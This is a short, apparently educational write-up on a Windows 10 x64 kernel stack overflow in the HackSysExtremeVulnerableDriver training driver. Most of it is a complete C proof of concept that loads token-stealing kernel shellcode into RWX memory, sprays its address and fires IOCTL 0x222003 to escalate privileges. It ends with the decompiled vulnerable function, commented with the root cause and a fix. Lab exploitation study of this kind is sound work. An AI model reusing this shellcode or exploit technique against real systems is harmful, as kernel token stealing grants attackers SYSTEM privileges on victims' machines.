win-kernel-exp-2

栈溢出在win10x64的讨论

poc:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

#include <windows.h>

/*
 * Byte count handed to DeviceIoControl as the input-buffer size (see the
 * call at the end of main). Note the unit mismatch: the same constant also
 * sizes an int64_t array, so the array holds 8x more bytes than the driver
 * is told about.
 */
#define BUFFER_SIZE 4242

/*
 * HEVD stack-overflow PoC (the Win10 x64 discussion).
 *
 * As written: open the HEVD device, place a small payload in a user-mode
 * RWX allocation, fill the first 270 qwords of the input buffer with that
 * allocation's address, and hand the buffer to the driver via IOCTL
 * 0x222003. On the driver side, TriggerBufferOverflowStack copies Size
 * bytes into a fixed 2048-byte stack array with no bound check; that
 * missing check is the root cause and is what this input exercises.
 *
 * Returns -1 if the device cannot be opened; otherwise falls off the end
 * of main (implicit 0 in C99+). Whether the IOCTL itself succeeded is
 * never checked.
 */
int main()
{
    HANDLE hHEVD = NULL;        /* device handle; never closed (see note at the IOCTL) */
    LPVOID lpMemory = NULL;     /* user-mode RWX page that receives the payload */
    DWORD bytesReturned = 0;    /* mandatory out-param for DeviceIoControl; value unused */

    int i = 0;
    int shellcodeLength = 62;   /* byte length of the payload below (12 instructions, 62 bytes; excludes the string's NUL) */
    int64_t buffer[BUFFER_SIZE] = {0};  /* IOCTL input: 8 * 4242 = 33936 bytes on the stack, zeroed */

    char shellcode[] =
    // python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint
    // NOTE(review): every structure offset below is hard-coded for one
    // particular kernel build; presumably taken from the test VM -- confirm.

    "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
    "\x48\x8b\x80\xb8\x00\x00\x00" // mov rax, qword ptr [rax + 0xb8]
    "\x48\x89\xc1" // mov rcx, rax
    "\xb2\x04" // mov dl, 4
    "\x48\x8b\x80\x48\x04\x00\x00" // mov rax, qword ptr [rax + 0x448]
    "\x48\x2d\x48\x04\x00\x00" // sub rax, 0x448
    "\x38\x90\x40\x04\x00\x00" // cmp byte ptr [rax + 0x440], dl
    "\x75\xeb" // jne 0x1017
    "\x48\x8b\x90\xb8\x04\x00\x00" // mov rdx, qword ptr [rax + 0x4b8]
    "\x48\x89\x91\xb8\x04\x00\x00" // mov qword ptr [rcx + 0x4b8], rdx

    "\x5d" // pop rbp
    "\xc2\x08\x00"; // ret 8


    printf("[*] Getting a handle on HEVD\n");

    /* Opens the driver's device object by its \\.\ name. */
    hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                        (GENERIC_READ | GENERIC_WRITE),
                        0x00,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    printf("[*] Allocating RWX memory\n");
    /*
     * NOTE(review): the result is not checked. VirtualAlloc returns NULL on
     * failure and the memcpy below would then write through a null pointer;
     * an `if (lpMemory == NULL)` guard that also closes hHEVD belongs here.
     */
    lpMemory = VirtualAlloc(NULL,
                            shellcodeLength,
                            (MEM_COMMIT | MEM_RESERVE),
                            PAGE_EXECUTE_READWRITE);

    printf("[*] Copying shellcode into RWX memory\n");
    memcpy(lpMemory, shellcode, shellcodeLength);

    printf("[*] Spraying return address: 0x%p\n", lpMemory);
    /*
     * 270 qwords = 2160 bytes, 112 bytes more than the driver's 2048-byte
     * KernelBuffer, so the driver-side copy runs past the end of that array.
     * The same value is repeated rather than placed at a computed offset
     * (hence the original remark about accuracy).
     * NOTE(review): lpMemory is a user-mode page; whether the kernel will
     * execute from it depends on the target's mitigations (e.g. SMEP on x64),
     * which nothing here accounts for.
     */
    for (i = 0; i < 270; i++)
    {
        /* Spray the return address, who cares about accuracy ;) */
        buffer[i] = (int64_t)lpMemory;
    }

    printf("[*] Triggering control code 0x222003\n");
    /*
     * BUFFER_SIZE (4242) is passed as a byte count, so the driver sees
     * Size = 4242 and copies only that prefix of the 33936-byte array --
     * still more than the 2160 sprayed bytes.
     * NOTE(review): the BOOL result is ignored and hHEVD is never closed;
     * a rejected IOCTL is indistinguishable from success here.
     */
    DeviceIoControl(hHEVD,
                    0x222003,
                    buffer,
                    BUFFER_SIZE,
                    NULL,
                    0x00,
                    &bytesReturned,
                    NULL);
}

触发的函数还是老样子:

/*
 * Decompiled (IDA-style) body of HEVD's stack-overflow trigger, shown here
 * as the vulnerable sink that the PoC's IOCTL reaches.
 *
 * Root cause: memmove copies the caller-controlled Size bytes into a fixed
 * 2048-byte stack array (512 * sizeof(unsigned int)) without ever comparing
 * Size against sizeof(KernelBuffer). Any Size > 2048 writes past the array
 * into the rest of the frame. The fix is a bound check before the copy,
 * e.g. `if (Size > sizeof(KernelBuffer)) return STATUS_INVALID_BUFFER_SIZE;`
 * (or clamping the copy length to sizeof(KernelBuffer)).
 *
 * UserBuffer/Size: the IOCTL input buffer and its byte length as supplied
 * from user mode. Returns 0 (STATUS_SUCCESS) unconditionally.
 */
__int64 __fastcall TriggerBufferOverflowStack(void *UserBuffer, size_t Size)
{
    /* 2048 bytes; the only local the decompiler shows in this frame. */
    unsigned int KernelBuffer[512]; // [rsp+20h] [rbp-818h] BYREF

    memset(KernelBuffer, 0, sizeof(KernelBuffer));
    /*
     * Probes a fixed 0x800 (2048) bytes of user memory, not Size bytes: the
     * probe is sized to KernelBuffer while the copy below is not. A Size
     * larger than 0x800 is therefore both an overflow of KernelBuffer and a
     * read past the probed user range.
     */
    ProbeForRead(UserBuffer, 0x800ui64, 1u);
    /* 0x4D = DPFLTR_IHVDRIVER_ID, 3 = DPFLTR_INFO_LEVEL: kernel debug output only. */
    DbgPrintEx(0x4Du, 3u, "[+] UserBuffer: 0x%p\n", UserBuffer);
    DbgPrintEx(0x4Du, 3u, "[+] UserBuffer Size: 0x%X\n", Size);
    DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer: 0x%p\n", KernelBuffer);
    DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer Size: 0x%X\n", 2048i64);
    DbgPrintEx(0x4Du, 3u, "[+] Triggering Buffer Overflow in Stack\n");
    /* The vulnerable copy: length is Size, destination holds 2048 bytes. */
    memmove(KernelBuffer, UserBuffer, Size);
    return 0i64;
}